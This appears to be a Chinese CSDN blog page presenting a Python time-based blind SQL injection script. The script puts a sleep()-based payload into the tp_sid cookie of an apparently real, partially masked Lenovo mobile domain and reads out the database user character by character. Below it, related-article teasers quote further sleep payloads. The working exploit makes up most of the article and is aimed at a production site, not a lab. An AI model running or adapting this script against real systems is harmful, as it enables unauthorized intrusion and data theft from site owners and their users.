python mysql延时注入,Python系列之——时间盲注脚本编写

最新推荐文章于 2022-11-30 22:02:53 发布
最新推荐文章于 2022-11-30 22:02:53 发布
阅读量329 收藏
点赞数
文章标签: python mysql延时注入

Python 爬虫 延时判断 匹配 用户名
关键词由CSDN通过智能技术生成

[Python] 纯文本查看 复制代码#!/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import time

payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹配用的字符串

user='' #存匹配到的字符的字符串

print 'Start to retrive current user:'

for i in range(1,23): #数据长度 这里我偷了下懒 没有先获取长度

for payload in payloads: #遍历取出字符

startTime=time.time()

url = r'http://xxxxx.lenovomobile.com/?lenovo/regist.html=&username=&email=&submit=%E6%8F%90%E4%BA%A4%E8%B5%84%E6%96%99' #url

cookies = {

'first_sourceid':r"223.202.62.227",

'first_domain':r"223.202.62.227",

'ln_v':r"vid%3D%3E157dd50b5eb5808%7C%7C%7Cfsts%3D%3E1476886836710%7C%7C%7Cdsfs%3D%3E17077%7C%7C%7Cnps%3D%3E7",

'tp_sid':r"EWeFPJ'%2b(select*from(select if(user() like '"+user+payload+r"%',sleep(5),0))a)%2b'", #连接payload

}

response=requests.get(url,cookies=cookies) #发送请求

if time.time() - startTime > 5: #判断是否延时了5秒

user+=payload #是的话连接进user里 然后退出当前这一层的循环

print 'user is:'+user

break

print '\n[Done] current user is %s' %user #匹配不出数据后 打印user变量

weixin_39670857
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全:SQL注入时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 2216
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
mysql延时注入脚本_py延迟注入SQL脚本
weixin_29450147的博客
01-19 273
#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):threading.Thread.__init_...
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1607
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1315
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
Python----POC到EXP(requests模块、python脚本实现布尔盲注延时注入
Pluto.的博客
12-27 2397
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
mysql 时间盲注_时间盲注类插件
weixin_39898380的博客
01-27 177
时间盲注类插件这一类的注入在返回页面中没有回显,但可以根据返回页面的结果判断构造的SQL条件语句的真假性。实例范例插件:#!/usr/bin/env python# -*- coding: utf-8 -*-def assign(service, arg):if service == fingerprint.weaver_e_office:return True, argdef time_sql(...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入延时...
Python微博热搜榜信息爬取项目.zip
06-03
该项目是一个使用Python语言实现的微博热搜信息爬取项目,旨在帮助学习者掌握网络爬虫技术在实际场景中的应用。Python因其简洁易读的语法和丰富的第三方库,成为了爬虫开发的首选语言。在这个项目中,你将学习到如何...
Python实现天天基金数据爬取
08-22
Python编程领域,爬虫技术是获取网络数据的重要手段,特别是在金融数据分析中,如"Python实现天天基金数据爬取"这个项目所示。天天基金网是中国知名的基金信息平台,提供了丰富的基金数据供投资者参考。本项目旨在...
爬虫+数据分析实战项目(基于python).zip
01-17
【描述】"python项目"表明这个压缩包可能包含一系列使用Python编写的代码和脚本,这些代码可能是用于实现特定的爬虫任务和数据分析过程。Python因其简洁的语法和丰富的第三方库(如requests、BeautifulSoup、Scrapy...
Python定时爬取东方财富行情数据代码
03-03
本项目提到了SQL脚本,意味着数据会被存储到SQL数据库中,如MySQL、SQLite或PostgreSQL。Python的`pymysql`、`sqlite3`或`psycopg2`等库可以用来连接数据库,执行SQL语句进行数据的插入、更新和查询。在实际操作中,...
python的sqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 4087
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分盲注实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
基于时间盲注python脚本
weixin_43460822的博客
10-07 2279
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
python mysql延时注入_python延迟注入
weixin_42502075的博客
01-28 316
如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可[cc lang="python"]#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threa...
py延迟注入SQL脚本
angaoux03775的博客
03-05 349
延迟注入工具(python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): ...
[教程] 基于时间盲注python3脚本编写
LuckySec
04-14 2933
0x001 时间盲注简介   时间盲注就是在页面进行SQL注入并执行后,前端页面无法回显注入的信息。此时,我们可以利用sleep()函数来控制延迟页面返回结果的时间,进而判断注入的SQL语句是否正确,这个过程称之为时间盲注。但如果手工进行注入的话,过程是非常频繁且耗时的,为了提高效率,我们需要编写自动化脚本替我们去完成这些注入工作。 0x002 漏洞测试代码 以下为本次实验测试的基于时间的数字...
CTF实验吧-who are you?【基于sleep盲注脚本
Sp4rkW的博客
07-21 5530
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先打开链接看到显示your ip is : xxx 首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系 实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧...
教科书般的mysql布尔型盲注(附验证脚本)
qq_35855403的博客
08-16 1660
遇到一收费外挂,登录处抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX...
SQL盲注脚本MySQL
卧龙居
11-13 1297
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
python爬虫的流程
最新发布
06-22
4. **编写爬虫代码**: 创建Python脚本,使用选择器或解析器提取数据,例如通过`.select()`方法获取BeautifulSoup中的元素。 5. **处理异常和反爬机制**: 网站可能会有反爬虫措施,如验证码、IP限制等,要设计适当的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值